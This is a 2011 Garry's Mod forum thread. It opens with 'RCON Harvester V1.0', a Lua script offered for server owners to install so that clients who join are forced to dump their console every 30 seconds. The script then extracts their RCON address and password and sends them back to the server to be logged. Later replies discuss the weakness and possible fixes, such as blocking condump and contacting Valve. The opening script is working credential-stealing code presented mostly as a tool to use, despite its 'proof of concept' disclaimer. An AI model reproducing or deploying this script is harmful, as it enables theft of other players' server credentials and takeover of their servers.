RCON Harvest V1.0 - Harvest your client's passwords! - Garry's Mod

[release]RCON Harvester V1.0 is the [b]revolutionary[/b] RCON password stealing script. Simply install it on your server, piss off your clients with constant freezes, and you can have their rcon password at no charge! Simply save this code in your server's lua/autorun folder as "rcon.lua" and watch as the passwords roll in! [lua]if SERVER then AddCSLuaFile("rcon.lua") concommand.Add("sendshit" , function(p,c,a) filex.Append("rcon_logs.txt" , "\n"..a[1].." -- "..a[2]) end ) timer.Create("It's harvest time!" , 30 , 0 , function() umsg.Start("herpderpin") umsg.End() end ) MsgN("[RCON] Harvester V1.0 active!") return end usermessage.Hook("herpderpin" , function(um) RunConsoleCommand("condump") timer.Simple(2,function() local files = file.Find("../condump*.txt") local latest = files[#files] local cdump = file.Read("../"..latest) local server = cdump:match("rcon_address (.-)\n") local pass = cdump:match("rcon_password (.-)\n") if pass then RunConsoleCommand("sendshit" , server or "127.0.0.1" , pass) MsgN(server.."|"..pass) end end ) end )[/lua] Disclaimer: This is a proof of concept and should not be abused.[/release]

credits to seth for the method

How much people still use the console for rcon stuff today? I mainly use HLSW to do rcon-stuff

Or spam useless data to any servers running this with the sendshit command just to piss them off

User's own fault for saving rcon password, TBH. I've used the very same method to help people out of trouble since they didn't either have console or didn't know what to look for, except I used RequestFile to download the condump (I think) or did I use it to grab screenshots from people, anyways, helps to spot some startup lua errors and such from complaining nontechnical clients.

Also wouldn't it be a good idea to remove the condump after you are done with it

[QUOTE=King Flawless;28912635]Also wouldn't it be a good idea to remove the condump after you are done with it[/QUOTE] file.Delete is restricted to the data directory. [editline]31st March 2011[/editline] I should probably email valve and tell them to remove the rcon password from condump.

python broke my auto-merge :ninja: [editline]31st March 2011[/editline] [QUOTE=FlapadarV2;28912647]I should probably email valve and tell them to remove the rcon password from condump.[/QUOTE] Unlikely they will do it but it cant hurt to try [editline]31st March 2011[/editline] Fuck sake now flapjack broke my auto-merge to complain about my auto-merge being broken

[QUOTE=FlapadarV2;28912647]file.Delete is restricted to the data directory. [editline]31st March 2011[/editline] I should probably email valve and tell them to remove the rcon password from condump.[/QUOTE] That's overcomplicating it, all Garry has to do it block condump from RCC/Player.ConCommand.

all the more reason to never join any server but my own :allears:

[QUOTE=Chrisaster;28913100]That's overcomplicating it, all Garry has to do it block condump from RCC/Player.ConCommand.[/QUOTE] Couldn't someone use INetChannel::RequestFile to upload condumps to the server?

[QUOTE=FlapadarV2;28913714]Couldn't someone use INetChannel::RequestFile to upload condumps to the server?[/QUOTE] How's the condump going to be made in the first place?

[QUOTE=FlapadarV2;28913714]Couldn't someone use INetChannel::RequestFile to upload condumps to the server?[/QUOTE] can't run the command in other source engine games because of FCVAR_SERVER_CAN_EXECUTE. Chris just told me 10 minutes ago but i still take all credit for that smart answere.